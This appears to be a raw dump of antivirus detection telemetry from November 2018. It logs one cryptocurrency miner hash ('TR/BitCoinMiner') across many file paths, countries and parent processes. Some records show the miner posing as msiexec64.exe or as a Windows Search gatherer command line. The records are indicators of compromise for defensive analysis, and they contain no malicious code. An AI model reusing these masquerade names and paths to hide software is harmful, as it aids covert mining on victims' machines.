  Row(detection=Row(filename='msiexec64_2450316e.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2450316e.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1b17d0b7.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1b17d0b7.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1cd7235c.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1cd7235c.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_170ec789.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_170ec789.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140242-f11d422f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140242-F11D422F', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140235-effc0d6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140235-EFFC0D6F', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215053-7d53b087', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215053-7D53B087', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200517-077858ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200517-077858FF', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:05:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140244-f1647eb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140244-F1647EB5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140245-f1ad7d6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140245-F1AD7D6D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140234-efb581b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140234-EFB581B4', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215040-7b084beb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215040-7B084BEB', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140240-f0d52426', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140240-F0D52426', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140239-f08d3e3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140239-F08D3E3D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140221-ed726bf3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140221-ED726BF3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140226-ee495988', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140226-EE495988', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212431-60464a72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212431-60464A72', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:24:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140232-ef6d4d16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140232-EF6D4D16', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221143-5e7931a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221143-5E7931A2', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:11:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085558-ffc8366b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-085558-FFC8366B', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:56:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212547-6de09a54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212547-6DE09A54', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:25:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140219-ed2aabd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140219-ED2AABD0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140248-f23ca917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140248-F23CA917', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140224-ee028aa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140224-EE028AA3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140259-f40247aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140259-F40247AA', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140229-eeddbf3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140229-EEDDBF3D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140223-edbaff06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140223-EDBAFF06', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8a9e', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8a9e', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8c5b', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8c5b', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214208-1ea579c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214208-1EA579C6', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221859-ad2a2d6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221859-AD2A2D6C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211126-d2b130a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-211126-D2B130A0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:11:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222259-d84ad23a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-222259-D84AD23A', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:23:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8cf7', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8cf7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool_rt\\msIExEc64.ExE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=4355024, timestamp='2018-11-04T13:18:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8d9d', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8d9d', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205738-3d8be7c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205738-3D8BE7C3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:57:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8c56', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8c56', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215158-88ed4437', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215158-88ED4437', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212618-7377dc77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212618-7377DC77', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:26:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8c3c', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8c3c', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8e36', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8e36', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8edc', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8edc', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221456-814ff932', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221456-814FF932', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221845-aa902139', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221845-AA902139', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:18:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221303-6cf7e3cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221303-6CF7E3CD', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:13:06Z'), dt=datetime.date(2018, 11, 4)),
